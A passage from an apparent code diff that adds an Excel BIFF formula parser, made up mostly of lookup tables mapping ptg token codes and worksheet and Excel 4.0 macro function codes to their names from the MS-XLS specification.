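# Token stream for =SUM(1,2)*3 in postfix order: 1 2 SUM(2) 3 *
stack = ['1', '2']
StackFunction(stack, 'SUM', 2)
stack.append('3')
StackBinary(stack, '*')
print(stack[0])  # SUM(1,2)*3
```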
+
+def ParseExpression(expression, definesNames, sheetNames, cellrefformat):
+ dTokens = {
+0x01: 'ptgExp',
+0x02: 'ptgTbl',
+0x03: 'ptgAdd',
+0x04: 'ptgSub',
+0x05: 'ptgMul',
+0x06: 'ptgDiv',
+0x07: 'ptgPower',
+0x08: 'ptgConcat',
+0x09: 'ptgLT',
+0x0A: 'ptgLE',
+0x0B: 'ptgEQ',
+0x0C: 'ptgGE',
+0x0D: 'ptgGT',
+0x0E: 'ptgNE',
+0x0F: 'ptgIsect',
+0x10: 'ptgUnion',
+0x11: 'ptgRange',
+0x12: 'ptgUplus',
+0x13: 'ptgUminus',
+0x14: 'ptgPercent',
+0x15: 'ptgParen',
+0x16: 'ptgMissArg',
+0x17: 'ptgStr',
+0x18: 'ptgExtend',
+0x19: 'ptgAttr',
+0x1A: 'ptgSheet',
+0x1B: 'ptgEndSheet',
+0x1C: 'ptgErr',
+0x1D: 'ptgBool',
+0x1E: 'ptgInt',
+0x1F: 'ptgNum',
+0x20: 'ptgArray',
+0x21: 'ptgFunc',
+0x22: 'ptgFuncVar',
+0x23: 'ptgName',
+0x24: 'ptgRef',
+0x25: 'ptgArea',
+0x26: 'ptgMemArea',
+0x27: 'ptgMemErr',
+0x28: 'ptgMemNoMem',
+0x29: 'ptgMemFunc',
+0x2A: 'ptgRefErr',
+0x2B: 'ptgAreaErr',
+0x2C: 'ptgRefN',
+0x2D: 'ptgAreaN',
+0x2E: 'ptgMemAreaN',
+0x2F: 'ptgMemNoMemN',
+0x39: 'ptgNameX',
+0x3A: 'ptgRef3d',
+0x3B: 'ptgArea3d',
+0x3C: 'ptgRefErr3d',
+0x3D: 'ptgAreaErr3d',
+0x40: 'ptgArrayV',
+0x41: 'ptgFuncV',
+0x42: 'ptgFuncVarV',
+0x43: 'ptgNameV',
+0x44: 'ptgRefV',
+0x45: 'ptgAreaV',
+0x46: 'ptgMemAreaV',
+0x47: 'ptgMemErrV',
+0x48: 'ptgMemNoMemV',
+0x49: 'ptgMemFuncV',
+0x4A: 'ptgRefErrV',
+0x4B: 'ptgAreaErrV',
+0x4C: 'ptgRefNV',
+0x4D: 'ptgAreaNV',
+0x4E: 'ptgMemAreaNV',
+0x4F: 'ptgMemNoMemNV',
+0x58: 'ptgFuncCEV',
+0x59: 'ptgNameXV',
+0x5A: 'ptgRef3dV',
+0x5B: 'ptgArea3dV',
+0x5C: 'ptgRefErr3dV',
+0x5D: 'ptgAreaErr3dV',
+0x60: 'ptgArrayA',
+0x61: 'ptgFuncA',
+0x62: 'ptgFuncVarA',
+0x63: 'ptgNameA',
+0x64: 'ptgRefA',
+0x65: 'ptgAreaA',
+0x66: 'ptgMemAreaA',
+0x67: 'ptgMemErrA',
+0x68: 'ptgMemNoMemA',
+0x69: 'ptgMemFuncA',
+0x6A: 'ptgRefErrA',
+0x6B: 'ptgAreaErrA',
+0x6C: 'ptgRefNA',
+0x6D: 'ptgAreaNA',
+0x6E: 'ptgMemAreaNA',
+0x6F: 'ptgMemNoMemNA',
+0x78: 'ptgFuncCEA',
+0x79: 'ptgNameXA',
+0x7A: 'ptgRef3dA',
+0x7B: 'ptgArea3dA',
+0x7C: 'ptgRefErr3dA',
+0x7D: 'ptgAreaErr3dA',
+}
+
+ dFunctions = {
+#https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-xls/00b5dd7d-51ca-4938-b7b7-483fe0e5933b
+0x0000: 'COUNT',
+0x0001: 'IF',
+0x0002: 'ISNA',
+0x0003: 'ISERROR',
+0x0004: 'SUM',
+0x0005: 'AVERAGE',
+0x0006: 'MIN',
+0x0007: 'MAX',
+0x0008: 'ROW',
+0x0009: 'COLUMN',
+0x000A: 'NA',
+0x000B: 'NPV',
+0x000C: 'STDEV',
+0x000D: 'DOLLAR',
+0x000E: 'FIXED',
+0x000F: 'SIN',
+0x0010: 'COS',
+0x0011: 'TAN',
+0x0012: 'ATAN',
+0x0013: 'PI',
+0x0014: 'SQRT',
+0x0015: 'EXP',
+0x0016: 'LN',
+0x0017: 'LOG10',
+0x0018: 'ABS',
+0x0019: 'INT',
+0x001A: 'SIGN',
+0x001B: 'ROUND',
+0x001C: 'LOOKUP',
+0x001D: 'INDEX',
+0x001E: 'REPT',
+0x001F: ['MID', 3],
+0x0020: 'LEN',
+0x0021: 'VALUE',
+0x0022: 'TRUE',
+0x0023: 'FALSE',
+0x0024: 'AND',
+0x0025: 'OR',
+0x0026: 'NOT',
+0x0027: 'MOD',
+0x0028: 'DCOUNT',
+0x0029: 'DSUM',
+0x002A: 'DAVERAGE',
+0x002B: 'DMIN',
+0x002C: 'DMAX',
+0x002D: 'DSTDEV',
+0x002E: 'VAR',
+0x002F: 'DVAR',
+0x0030: 'TEXT',
+0x0031: 'LINEST',
+0x0032: 'TREND',
+0x0033: 'LOGEST',
+0x0034: 'GROWTH',
+0x0035: 'GOTO',
+0x0036: 'HALT',
+0x0037: 'RETURN',
+0x0038: 'PV',
+0x0039: 'FV',
+0x003A: 'NPER',
+0x003B: 'PMT',
+0x003C: 'RATE',
+0x003D: 'MIRR',
+0x003E: 'IRR',
+0x003F: 'RAND',
+0x0040: 'MATCH',
+0x0041: 'DATE',
+0x0042: 'TIME',
+0x0043: 'DAY',
+0x0044: 'MONTH',
+0x0045: 'YEAR',
+0x0046: 'WEEKDAY',
+0x0047: 'HOUR',
+0x0048: 'MINUTE',
+0x0049: 'SECOND',
+0x004A: ['NOW', 0],
+0x004B: 'AREAS',
+0x004C: 'ROWS',
+0x004D: 'COLUMNS',
+0x004E: 'OFFSET',
+0x004F: 'ABSREF',
+0x0050: 'RELREF',
+0x0051: 'ARGUMENT',
+0x0052: 'SEARCH',
+0x0053: 'TRANSPOSE',
+0x0054: 'ERROR',
+0x0055: 'STEP',
+0x0056: 'TYPE',
+0x0057: 'ECHO',
+0x0058: 'SET.NAME',
+0x0059: 'CALLER',
+0x005A: 'DEREF',
+0x005B: 'WINDOWS',
+0x005C: 'SERIES',
+0x005D: 'DOCUMENTS',
+0x005E: ['ACTIVE.CELL', 0],
+0x005F: 'SELECTION',
+0x0060: 'RESULT',
+0x0061: 'ATAN2',
+0x0062: 'ASIN',
+0x0063: 'ACOS',
+0x0064: 'CHOOSE',
+0x0065: 'HLOOKUP',
+0x0066: 'VLOOKUP',
+0x0067: 'LINKS',
+0x0068: 'INPUT',
+0x0069: 'ISREF',
+0x006A: 'GET.FORMULA',
+0x006B: 'GET.NAME',
+0x006C: ['SET.VALUE', 2],
+0x006D: 'LOG',
+0x006E: 'EXEC',
+0x006F: 'CHAR',
+0x0070: 'LOWER',
+0x0071: 'UPPER',
+0x0072: 'PROPER',
+0x0073: 'LEFT',
+0x0074: 'RIGHT',
+0x0075: 'EXACT',
+0x0076: 'TRIM',
+0x0077: 'REPLACE',
+0x0078: 'SUBSTITUTE',
+0x0079: 'CODE',
+0x007A: 'NAMES',
+0x007B: 'DIRECTORY',
+0x007C: 'FIND',
+0x007D: 'CELL',
+0x007E: 'ISERR',
+0x007F: 'ISTEXT',
+0x0080: 'ISNUMBER',
+0x0081: 'ISBLANK',
+0x0082: 'T',
+0x0083: 'N',
+0x0084: 'FOPEN',
+0x0085: 'FCLOSE',
+0x0086: 'FSIZE',
+0x0087: 'FREADLN',
+0x0088: 'FREAD',
+0x0089: 'FWRITELN',
+0x008A: 'FWRITE',
+0x008B: 'FPOS',
+0x008C: 'DATEVALUE',
+0x008D: 'TIMEVALUE',
+0x008E: 'SLN',
+0x008F: 'SYD',
+0x0090: 'DDB',
+0x0091: 'GET.DEF',
+0x0092: 'REFTEXT',
+0x0093: 'TEXTREF',
+0x0094: 'INDIRECT',
+0x0095: 'REGISTER',
+0x0096: 'CALL',
+0x0097: 'ADD.BAR',
+0x0098: 'ADD.MENU',
+0x0099: 'ADD.COMMAND',
+0x009A: 'ENABLE.COMMAND',
+0x009B: 'CHECK.COMMAND',
+0x009C: 'RENAME.COMMAND',
+0x009D: 'SHOW.BAR',
+0x009E: 'DELETE.MENU',
+0x009F: 'DELETE.COMMAND',
+0x00A0: 'GET.CHART.ITEM',
+0x00A1: 'DIALOG.BOX',
+0x00A2: 'CLEAN',
+0x00A3: 'MDETERM',
+0x00A4: 'MINVERSE',
+0x00A5: 'MMULT',
+0x00A6: 'FILES',
+0x00A7: 'IPMT',
+0x00A8: 'PPMT',
+0x00A9: 'COUNTA',
+0x00AA: 'CANCEL.KEY',
+0x00AB: 'FOR',
+0x00AC: 'WHILE',
+0x00AD: 'BREAK',
+0x00AE: ['NEXT', 0],
+0x00AF: 'INITIATE',
+0x00B0: 'REQUEST',
+0x00B1: 'POKE',
+0x00B2: 'EXECUTE',
+0x00B3: 'TERMINATE',
+0x00B4: 'RESTART',
+0x00B5: 'HELP',
+0x00B6: 'GET.BAR',
+0x00B7: 'PRODUCT',
+0x00B8: 'FACT',
+0x00B9: 'GET.CELL',
+0x00BA: 'GET.WORKSPACE',
+0x00BB: 'GET.WINDOW',
+0x00BC: 'GET.DOCUMENT',
+0x00BD: 'DPRODUCT',
+0x00BE: 'ISNONTEXT',
+0x00BF: 'GET.NOTE',
+0x00C0: 'NOTE',
+0x00C1: 'STDEVP',
+0x00C2: 'VARP',
+0x00C3: 'DSTDEVP',
+0x00C4: 'DVARP',
+0x00C5: 'TRUNC',
+0x00C6: 'ISLOGICAL',
+0x00C7: 'DCOUNTA',
+0x00C8: 'DELETE.BAR',
+0x00C9: 'UNREGISTER',
+0x00CC: 'USDOLLAR',
+0x00CD: 'FINDB',
+0x00CE: 'SEARCHB',
+0x00CF: 'REPLACEB',
+0x00D0: 'LEFTB',
+0x00D1: 'RIGHTB',
+0x00D2: 'MIDB',
+0x00D3: 'LENB',
+0x00D4: 'ROUNDUP',
+0x00D5: 'ROUNDDOWN',
+0x00D6: 'ASC',
+0x00D7: 'DBCS',
+0x00D8: 'RANK',
+0x00DB: 'ADDRESS',
+0x00DC: 'DAYS360',
+0x00DD: 'TODAY',
+0x00DE: 'VDB',
+0x00DF: 'ELSE',
+0x00E0: 'ELSE.IF',
+0x00E1: 'END.IF',
+0x00E2: 'FOR.CELL',
+0x00E3: 'MEDIAN',
+0x00E4: 'SUMPRODUCT',
+0x00E5: 'SINH',
+0x00E6: 'COSH',
+0x00E7: 'TANH',
+0x00E8: 'ASINH',
+0x00E9: 'ACOSH',
+0x00EA: 'ATANH',
+0x00EB: 'DGET',
+0x00EC: 'CREATE.OBJECT',
+0x00ED: 'VOLATILE',
+0x00EE: 'LAST.ERROR',
+0x00EF: 'CUSTOM.UNDO',
+0x00F0: 'CUSTOM.REPEAT',
+0x00F1: 'FORMULA.CONVERT',
+0x00F2: 'GET.LINK.INFO',
+0x00F3: 'TEXT.BOX',
+0x00F4: 'INFO',
+0x00F5: 'GROUP',
+0x00F6: 'GET.OBJECT',
+0x00F7: 'DB',
+0x00F8: 'PAUSE',
+0x00FB: 'RESUME',
+0x00FC: 'FREQUENCY',
+0x00FD: 'ADD.TOOLBAR',
+0x00FE: 'DELETE.TOOLBAR',
+0x00FF: 'User Defined Function',
+0x0100: 'RESET.TOOLBAR',
+0x0101: 'EVALUATE',
+0x0102: 'GET.TOOLBAR',
+0x0103: 'GET.TOOL',
+0x0104: 'SPELLING.CHECK',
+0x0105: 'ERROR.TYPE',
+0x0106: 'APP.TITLE',
+0x0107: 'WINDOW.TITLE',
+0x0108: 'SAVE.TOOLBAR',
+0x0109: 'ENABLE.TOOL',
+0x010A: 'PRESS.TOOL',
+0x010B: 'REGISTER.ID',
+0x010C: 'GET.WORKBOOK',
+0x010D: 'AVEDEV',
+0x010E: 'BETADIST',
+0x010F: 'GAMMALN',
+0x0110: 'BETAINV',
+0x0111: 'BINOMDIST',
+0x0112: 'CHIDIST',
+0x0113: 'CHIINV',
+0x0114: 'COMBIN',
+0x0115: 'CONFIDENCE',
+0x0116: 'CRITBINOM',
+0x0117: 'EVEN',
+0x0118: 'EXPONDIST',
+0x0119: 'FDIST',
+0x011A: 'FINV',
+0x011B: 'FISHER',
+0x011C: 'FISHERINV',
+0x011D: 'FLOOR',
+0x011E: 'GAMMADIST',
+0x011F: 'GAMMAINV',
+0x0120: 'CEILING',
+0x0121: 'HYPGEOMDIST',
+0x0122: 'LOGNORMDIST',
+0x0123: 'LOGINV',
+0x0124: 'NEGBINOMDIST',
+0x0125: 'NORMDIST',
+0x0126: 'NORMSDIST',
+0x0127: 'NORMINV',
+0x0128: 'NORMSINV',
+0x0129: 'STANDARDIZE',
+0x012A: 'ODD',
+0x012B: 'PERMUT',
+0x012C: 'POISSON',
+0x012D: 'TDIST',
+0x012E: 'WEIBULL',
+0x012F: 'SUMXMY2',
+0x0130: 'SUMX2MY2',
+0x0131: 'SUMX2PY2',
+0x0132: 'CHITEST',
+0x0133: 'CORREL',
+0x0134: 'COVAR',
+0x0135: 'FORECAST',
+0x0136: 'FTEST',
+0x0137: 'INTERCEPT',
+0x0138: 'PEARSON',
+0x0139: 'RSQ',
+0x013A: 'STEYX',
+0x013B: 'SLOPE',
+0x013C: 'TTEST',
+0x013D: 'PROB',
+0x013E: 'DEVSQ',
+0x013F: 'GEOMEAN',
+0x0140: 'HARMEAN',
+0x0141: 'SUMSQ',
+0x0142: 'KURT',
+0x0143: 'SKEW',
+0x0144: 'ZTEST',
+0x0145: 'LARGE',
+0x0146: 'SMALL',
+0x0147: 'QUARTILE',
+0x0148: 'PERCENTILE',
+0x0149: 'PERCENTRANK',
+0x014A: 'MODE',
+0x014B: 'TRIMMEAN',
+0x014C: 'TINV',
+0x014E: 'MOVIE.COMMAND',
+0x014F: 'GET.MOVIE',
+0x0150: 'CONCATENATE',
+0x0151: 'POWER',
+0x0152: 'PIVOT.ADD.DATA',
+0x0153: 'GET.PIVOT.TABLE',
+0x0154: 'GET.PIVOT.FIELD',
+0x0155: 'GET.PIVOT.ITEM',
+0x0156: 'RADIANS',
+0x0157: 'DEGREES',
+0x0158: 'SUBTOTAL',
+0x0159: 'SUMIF',
+0x015A: 'COUNTIF',
+0x015B: 'COUNTBLANK',
+0x015C: 'SCENARIO.GET',
+0x015D: 'OPTIONS.LISTS.GET',
+0x015E: 'ISPMT',
+0x015F: 'DATEDIF',
+0x0160: 'DATESTRING',
+0x0161: 'NUMBERSTRING',
+0x0162: 'ROMAN',
+0x0163: 'OPEN.DIALOG',
+0x0164: 'SAVE.DIALOG',
+0x0165: 'VIEW.GET',
+0x0166: 'GETPIVOTDATA',
+0x0167: 'HYPERLINK',
+0x0168: 'PHONETIC',
+0x0169: 'AVERAGEA',
+0x016A: 'MAXA',
+0x016B: 'MINA',
+0x016C: 'STDEVPA',
+0x016D: 'VARPA',
+0x016E: 'STDEVA',
+0x016F: 'VARA',
+0x0170: 'BAHTTEXT',
+0x0171: 'THAIDAYOFWEEK',
+0x0172: 'THAIDIGIT',
+0x0173: 'THAIMONTHOFYEAR',
+0x0174: 'THAINUMSOUND',
+0x0175: 'THAINUMSTRING',
+0x0176: 'THAISTRINGLENGTH',
+0x0177: 'ISTHAIDIGIT',
+0x0178: 'ROUNDBAHTDOWN',
+0x0179: 'ROUNDBAHTUP',
+0x017A: 'THAIYEAR',
+0x017B: 'RTD',
+0x01E0: 'IFERROR',
+
+#https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-xls/0b8acba5-86d2-4854-836e-0afaee743d44
+0x8000: 'BEEP',
+0x8001: 'OPEN',
+0x8002: 'OPEN.LINKS',
+0x8003: 'CLOSE.ALL',
+0x8004: 'SAVE',
+0x8005: 'SAVE.AS',
+0x8006: 'FILE.DELETE',
+0x8007: 'PAGE.SETUP',
+0x8008: 'PRINT',
+0x8009: 'PRINTER.SETUP',
+0x800A: 'QUIT',
+0x800B: 'NEW.WINDOW',
+0x800C: 'ARRANGE.ALL',
+0x800D: 'WINDOW.SIZE',
+0x800E: 'WINDOW.MOVE',
+0x800F: 'FULL',
+0x8010: 'CLOSE',
+0x8011: 'RUN',
+0x8016: 'SET.PRINT.AREA',
+0x8017: 'SET.PRINT.TITLES',
+0x8018: 'SET.PAGE.BREAK',
+0x8019: 'REMOVE.PAGE.BREAK',
+0x801A: 'FONT',
+0x801B: 'DISPLAY',
+0x801C: 'PROTECT.DOCUMENT',
+0x801D: 'PRECISION',
+0x801E: 'A1.R1C1',
+0x801F: 'CALCULATE.NOW',
+0x8020: 'CALCULATION',
+0x8022: 'DATA.FIND',
+0x8023: 'EXTRACT',
+0x8024: 'DATA.DELETE',
+0x8025: 'SET.DATABASE',
+0x8026: 'SET.CRITERIA',
+0x8027: 'SORT',
+0x8028: 'DATA.SERIES',
+0x8029: 'TABLE',
+0x802A: 'FORMAT.NUMBER',
+0x802B: 'ALIGNMENT',
+0x802C: 'STYLE',
+0x802D: 'BORDER',
+0x802E: 'CELL.PROTECTION',
+0x802F: 'COLUMN.WIDTH',
+0x8030: 'UNDO',
+0x8031: 'CUT',
+0x8032: 'COPY',
+0x8033: 'PASTE',
+0x8034: 'CLEAR',
+0x8035: 'PASTE.SPECIAL',
+0x8036: 'EDIT.DELETE',
+0x8037: 'INSERT',
+0x8038: 'FILL.RIGHT',
+0x8039: 'FILL.DOWN',
+0x803D: 'DEFINE.NAME',
+0x803E: 'CREATE.NAMES',
+0x803F: 'FORMULA.GOTO',
+0x8040: 'FORMULA.FIND',
+0x8041: 'SELECT.LAST.CELL',
+0x8042: 'SHOW.ACTIVE.CELL',
+0x8043: 'GALLERY.AREA',
+0x8044: 'GALLERY.BAR',
+0x8045: 'GALLERY.COLUMN',
+0x8046: 'GALLERY.LINE',
+0x8047: 'GALLERY.PIE',
+0x8048: 'GALLERY.SCATTER',
+0x8049: 'COMBINATION',
+0x804A: 'PREFERRED',
+0x804B: 'ADD.OVERLAY',
+0x804C: 'GRIDLINES',
+0x804D: 'SET.PREFERRED',
+0x804E: 'AXES',
+0x804F: 'LEGEND',
+0x8050: 'ATTACH.TEXT',
+0x8051: 'ADD.ARROW',
+0x8052: 'SELECT.CHART',
+0x8053: 'SELECT.PLOT.AREA',
+0x8054: 'PATTERNS',
+0x8055: 'MAIN.CHART',
+0x8056: 'OVERLAY',
+0x8057: 'SCALE',
+0x8058: 'FORMAT.LEGEND',
+0x8059: 'FORMAT.TEXT',
+0x805A: 'EDIT.REPEAT',
+0x805B: 'PARSE',
+0x805C: 'JUSTIFY',
+0x805D: 'HIDE',
+0x805E: 'UNHIDE',
+0x805F: 'WORKSPACE',
+0x8060: 'FORMULA',
+0x8061: 'FORMULA.FILL',
+0x8062: 'FORMULA.ARRAY',
+0x8063: 'DATA.FIND.NEXT',
+0x8064: 'DATA.FIND.PREV',
+0x8065: 'FORMULA.FIND.NEXT',
+0x8066: 'FORMULA.FIND.PREV',
+0x8067: 'ACTIVATE',
+0x8068: 'ACTIVATE.NEXT',
+0x8069: 'ACTIVATE.PREV',
+0x806A: 'UNLOCKED.NEXT',
+0x806B: 'UNLOCKED.PREV',
+0x806C: 'COPY.PICTURE',
+0x806D: 'SELECT',
+0x806E: 'DELETE.NAME',
+0x806F: 'DELETE.FORMAT',
+0x8070: 'VLINE',
+0x8071: 'HLINE',
+0x8072: 'VPAGE',
+0x8073: 'HPAGE',
+0x8074: 'VSCROLL',
+0x8075: 'HSCROLL',
+0x8076: 'ALERT',
+0x8077: 'NEW',
+0x8078: 'CANCEL.COPY',
+0x8079: 'SHOW.CLIPBOARD',
+0x807A: 'MESSAGE',
+0x807C: 'PASTE.LINK',
+0x807D: 'APP.ACTIVATE',
+0x807E: 'DELETE.ARROW',
+0x807F: 'ROW.HEIGHT',
+0x8080: 'FORMAT.MOVE',
+0x8081: 'FORMAT.SIZE',
+0x8082: 'FORMULA.REPLACE',
+0x8083: 'SEND.KEYS',
+0x8084: 'SELECT.SPECIAL',
+0x8085: 'APPLY.NAMES',
+0x8086: 'REPLACE.FONT',
+0x8087: 'FREEZE.PANES',
+0x8088: 'SHOW.INFO',
+0x8089: 'SPLIT',
+0x808A: 'ON.WINDOW',
+0x808B: 'ON.DATA',
+0x808C: 'DISABLE.INPUT',
+0x808E: 'OUTLINE',
+0x808F: 'LIST.NAMES',
+0x8090: 'FILE.CLOSE',
+0x8091: 'SAVE.WORKBOOK',
+0x8092: 'DATA.FORM',
+0x8093: 'COPY.CHART',
+0x8094: 'ON.TIME',
+0x8095: 'WAIT',
+0x8096: 'FORMAT.FONT',
+0x8097: 'FILL.UP',
+0x8098: 'FILL.LEFT',
+0x8099: 'DELETE.OVERLAY',
+0x809B: 'SHORT.MENUS',
+0x809F: 'SET.UPDATE.STATUS',
+0x80A1: 'COLOR.PALETTE',
+0x80A2: 'DELETE.STYLE',
+0x80A3: 'WINDOW.RESTORE',
+0x80A4: 'WINDOW.MAXIMIZE',
+0x80A6: 'CHANGE.LINK',
+0x80A7: 'CALCULATE.DOCUMENT',
+0x80A8: 'ON.KEY',
+0x80A9: 'APP.RESTORE',
+0x80AA: 'APP.MOVE',
+0x80AB: 'APP.SIZE',
+0x80AC: 'APP.MINIMIZE',
+0x80AD: 'APP.MAXIMIZE',
+0x80AE: 'BRING.TO.FRONT',
+0x80AF: 'SEND.TO.BACK',
+0x80B9: 'MAIN.CHART.TYPE',
+0x80BA: 'OVERLAY.CHART.TYPE',
+0x80BB: 'SELECT.END',
+0x80BC: 'OPEN.MAIL',
+0x80BD: 'SEND.MAIL',
+0x80BE: 'STANDARD.FONT',
+0x80BF: 'CONSOLIDATE',
+0x80C0: 'SORT.SPECIAL',
+0x80C1: 'GALLERY.3D.AREA',
+0x80C2: 'GALLERY.3D.COLUMN',
+0x80C3: 'GALLERY.3D.LINE',
+0x80C4: 'GALLERY.3D.PIE',
+0x80C5: 'VIEW.3D',
+0x80C6: 'GOAL.SEEK',
+0x80C7: 'WORKGROUP',
+0x80C8: 'FILL.GROUP',
+0x80C9: 'UPDATE.LINK',
+0x80CA: 'PROMOTE',
+0x80CB: 'DEMOTE',
+0x80CC: 'SHOW.DETAIL',
+0x80CE: 'UNGROUP',
+0x80CF: 'OBJECT.PROPERTIES',
+0x80D0: 'SAVE.NEW.OBJECT',
+0x80D1: 'SHARE',
+0x80D2: 'SHARE.NAME',
+0x80D3: 'DUPLICATE',
+0x80D4: 'APPLY.STYLE',
+0x80D5: 'ASSIGN.TO.OBJECT',
+0x80D6: 'OBJECT.PROTECTION',
+0x80D7: 'HIDE.OBJECT',
+0x80D8: 'SET.EXTRACT',
+0x80D9: 'CREATE.PUBLISHER',
+0x80DA: 'SUBSCRIBE.TO',
+0x80DB: 'ATTRIBUTES',
+0x80DC: 'SHOW.TOOLBAR',
+0x80DE: 'PRINT.PREVIEW',
+0x80DF: 'EDIT.COLOR',
+0x80E0: 'SHOW.LEVELS',
+0x80E1: 'FORMAT.MAIN',
+0x80E2: 'FORMAT.OVERLAY',
+0x80E3: 'ON.RECALC',
+0x80E4: 'EDIT.SERIES',
+0x80E5: 'DEFINE.STYLE',
+0x80F0: 'LINE.PRINT',
+0x80F3: 'ENTER.DATA',
+0x80F9: 'GALLERY.RADAR',
+0x80FA: 'MERGE.STYLES',
+0x80FB: 'EDITION.OPTIONS',
+0x80FC: 'PASTE.PICTURE',
+0x80FD: 'PASTE.PICTURE.LINK',
+0x80FE: 'SPELLING',
+0x8100: 'ZOOM',
+0x8103: 'INSERT.OBJECT',
+0x8104: 'WINDOW.MINIMIZE',
+0x8109: 'SOUND.NOTE',
+0x810A: 'SOUND.PLAY',
+0x810B: 'FORMAT.SHAPE',
+0x810C: 'EXTEND.POLYGON',
+0x810D: 'FORMAT.AUTO',
+0x8110: 'GALLERY.3D.BAR',
+0x8111: 'GALLERY.3D.SURFACE',
+0x8112: 'FILL.AUTO',
+0x8114: 'CUSTOMIZE.TOOLBAR',
+0x8115: 'ADD.TOOL',
+0x8116: 'EDIT.OBJECT',
+0x8117: 'ON.DOUBLECLICK',
+0x8118: 'ON.ENTRY',
+0x8119: 'WORKBOOK.ADD',
+0x811A: 'WORKBOOK.MOVE',
+0x811B: 'WORKBOOK.COPY',
+0x811C: 'WORKBOOK.OPTIONS',
+0x811D: 'SAVE.WORKSPACE',
+0x8120: 'CHART.WIZARD',
+0x8121: 'DELETE.TOOL',
+0x8122: 'MOVE.TOOL',
+0x8123: 'WORKBOOK.SELECT',
+0x8124: 'WORKBOOK.ACTIVATE',
+0x8125: 'ASSIGN.TO.TOOL',
+0x8127: 'COPY.TOOL',
+0x8128: 'RESET.TOOL',
+0x8129: 'CONSTRAIN.NUMERIC',
+0x812A: 'PASTE.TOOL',
+0x812E: 'WORKBOOK.NEW',
+0x8131: 'SCENARIO.CELLS',
+0x8132: 'SCENARIO.DELETE',
+0x8133: 'SCENARIO.ADD',
+0x8134: 'SCENARIO.EDIT',
+0x8135: 'SCENARIO.SHOW',
+0x8136: 'SCENARIO.SHOW.NEXT',
+0x8137: 'SCENARIO.SUMMARY',
+0x8138: 'PIVOT.TABLE.WIZARD',
+0x8139: 'PIVOT.FIELD.PROPERTIES',
+0x813A: 'PIVOT.FIELD',
+0x813B: 'PIVOT.ITEM',
+0x813C: 'PIVOT.ADD.FIELDS',
+0x813E: 'OPTIONS.CALCULATION',
+0x813F: 'OPTIONS.EDIT',
+0x8140: 'OPTIONS.VIEW',
+0x8141: 'ADDIN.MANAGER',
+0x8142: 'MENU.EDITOR',
+0x8143: 'ATTACH.TOOLBARS',
+0x8144: 'VBAActivate',
+0x8145: 'OPTIONS.CHART',
+0x8148: 'VBA.INSERT.FILE',
+0x814A: 'VBA.PROCEDURE.DEFINITION',
+0x8150: 'ROUTING.SLIP',
+0x8152: 'ROUTE.DOCUMENT',
+0x8153: 'MAIL.LOGON',
+0x8156: 'INSERT.PICTURE',
+0x8157: 'EDIT.TOOL',
+0x8158: 'GALLERY.DOUGHNUT',
+0x815E: 'CHART.TREND',
+0x8160: 'PIVOT.ITEM.PROPERTIES',
+0x8162: 'WORKBOOK.INSERT',
+0x8163: 'OPTIONS.TRANSITION',
+0x8164: 'OPTIONS.GENERAL',
+0x8172: 'FILTER.ADVANCED',
+0x8175: 'MAIL.ADD.MAILER',
+0x8176: 'MAIL.DELETE.MAILER',
+0x8177: 'MAIL.REPLY',
+0x8178: 'MAIL.REPLY.ALL',
+0x8179: 'MAIL.FORWARD',
+0x817A: 'MAIL.NEXT.LETTER',
+0x817B: 'DATA.LABEL',
+0x817C: 'INSERT.TITLE',
+0x817D: 'FONT.PROPERTIES',
+0x817E: 'MACRO.OPTIONS',
+0x817F: 'WORKBOOK.HIDE',
+0x8180: 'WORKBOOK.UNHIDE',
+0x8181: 'WORKBOOK.DELETE',
+0x8182: 'WORKBOOK.NAME',
+0x8184: 'GALLERY.CUSTOM',
+0x8186: 'ADD.CHART.AUTOFORMAT',
+0x8187: 'DELETE.CHART.AUTOFORMAT',
+0x8188: 'CHART.ADD.DATA',
+0x8189: 'AUTO.OUTLINE',
+0x818A: 'TAB.ORDER',
+0x818B: 'SHOW.DIALOG',
+0x818C: 'SELECT.ALL',
+0x818D: 'UNGROUP.SHEETS',
+0x818E: 'SUBTOTAL.CREATE',
+0x818F: 'SUBTOTAL.REMOVE',
+0x8190: 'RENAME.OBJECT',
+0x819C: 'WORKBOOK.SCROLL',
+0x819D: 'WORKBOOK.NEXT',
+0x819E: 'WORKBOOK.PREV',
+0x819F: 'WORKBOOK.TAB.SPLIT',
+0x81A0: 'FULL.SCREEN',
+0x81A1: 'WORKBOOK.PROTECT',
+0x81A4: 'SCROLLBAR.PROPERTIES',
+0x81A5: 'PIVOT.SHOW.PAGES',
+0x81A6: 'TEXT.TO.COLUMNS',
+0x81A7: 'FORMAT.CHARTTYPE',
+0x81A8: 'LINK.FORMAT',
+0x81A9: 'TRACER.DISPLAY',
+0x81AE: 'TRACER.NAVIGATE',
+0x81AF: 'TRACER.CLEAR',
+0x81B0: 'TRACER.ERROR',
+0x81B1: 'PIVOT.FIELD.GROUP',
+0x81B2: 'PIVOT.FIELD.UNGROUP',
+0x81B3: 'CHECKBOX.PROPERTIES',
+0x81B4: 'LABEL.PROPERTIES',
+0x81B5: 'LISTBOX.PROPERTIES',
+0x81B6: 'EDITBOX.PROPERTIES',
+0x81B7: 'PIVOT.REFRESH',
+0x81B8: 'LINK.COMBO',
+0x81B9: 'OPEN.TEXT',
+0x81BA: 'HIDE.DIALOG',
+0x81BB: 'SET.DIALOG.FOCUS',
+0x81BC: 'ENABLE.OBJECT',
+0x81BD: 'PUSHBUTTON.PROPERTIES',
+0x81BE: 'SET.DIALOG.DEFAULT',
+0x81BF: 'FILTER',
+0x81C0: 'FILTER.SHOW.ALL',
+0x81C1: 'CLEAR.OUTLINE',
+0x81C2: 'FUNCTION.WIZARD',
+0x81C3: 'ADD.LIST.ITEM',
+0x81C4: 'SET.LIST.ITEM',
+0x81C5: 'REMOVE.LIST.ITEM',
+0x81C6: 'SELECT.LIST.ITEM',
+0x81C7: 'SET.CONTROL.VALUE',
+0x81C8: 'SAVE.COPY.AS',
+0x81CA: 'OPTIONS.LISTS.ADD',
+0x81CB: 'OPTIONS.LISTS.DELETE',
+0x81CC: 'SERIES.AXES',
+0x81CD: 'SERIES.X',
+0x81CE: 'SERIES.Y',
+0x81CF: 'ERRORBAR.X',
+0x81D0: 'ERRORBAR.Y',
+0x81D1: 'FORMAT.CHART',
+0x81D2: 'SERIES.ORDER',
+0x81D3: 'MAIL.LOGOFF',
+0x81D4: 'CLEAR.ROUTING.SLIP',
+0x81D5: 'APP.ACTIVATE.MICROSOFT',
+0x81D6: 'MAIL.EDIT.MAILER',
